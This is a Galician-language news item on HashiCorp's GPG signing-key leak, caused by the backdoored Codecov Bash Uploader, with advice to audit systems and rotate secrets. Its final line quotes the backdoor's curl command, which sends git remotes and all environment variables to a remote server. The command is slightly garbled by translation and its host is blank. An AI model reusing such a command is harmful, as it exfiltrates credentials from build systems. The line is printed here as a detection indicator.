HashiCorp, coñecida por desenvolver as ferramentas de código aberto Vagrant, Packer, Nomad e Terraform, anunciou a filtración da clave GPG privada utilizada para crear sinaturas dixitais que verifican as versións. Os atacantes que obtiveron acceso á clave GPG poderían facer cambios ocultos nos produtos HashiCorp comprobandoos cunha sinatura dixital correcta. Ao mesmo tempo, a empresa indicou que durante a auditoría non se identificaron rastros de intentos de realizar tales modificacións.
Actualmente, a chave GPG comprometida foi revogada e introduciuse unha nova chave no seu lugar. O problema afectou só á verificación mediante os ficheiros SHA256SUM e SHA256SUM.sig, e non afectou á xeración de sinaturas dixitais para os paquetes DEB e RPM de Linux subministrados a través de releases.hashicorp.com, así como aos mecanismos de verificación de versións para macOS e Windows (AuthentiCode) .
A filtración produciuse debido ao uso do script Codecov Bash Uploader (codecov-bash) na infraestrutura, deseñado para descargar informes de cobertura de sistemas de integración continua. Durante o ataque á empresa Codecov, ocultouse unha porta traseira no script especificado, a través do cal se enviaban contrasinais e claves de cifrado ao servidor dos atacantes.
Para piratear, os atacantes aproveitaron un erro no proceso de creación da imaxe Codecov Docker, que lles permitiu extraer datos de acceso a GCS (Google Cloud Storage), necesarios para facer cambios no script Bash Uploader distribuído desde o codecov.io sitio web. Os cambios realizáronse o 31 de xaneiro, permaneceron sen ser detectados durante dous meses e permitiron aos atacantes extraer información almacenada nos contornos do sistema de integración continua do cliente. Usando o código malicioso engadido, os atacantes poderían obter información sobre o repositorio Git probado e todas as variables de ambiente, incluíndo tokens, claves de cifrado e contrasinais transmitidos a sistemas de integración continua para organizar o acceso ao código de aplicacións, repositorios e servizos como Amazon Web Services e GitHub.
Ademais da chamada directa, utilizouse o script Codecov Bash Uploader como parte doutros cargadores, como Codecov-action (Github), Codecov-circleci-orb e Codecov-bitrise-step, cuxos usuarios tamén se ven afectados polo problema. Recoméndase a todos os usuarios de codecov-bash e produtos relacionados que auditen as súas infraestruturas, así como que cambien os contrasinais e as claves de cifrado. Podes comprobar a presenza dunha porta traseira nun script pola presenza da liña curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /cargar/v2 || verdade
Fonte: opennet.ru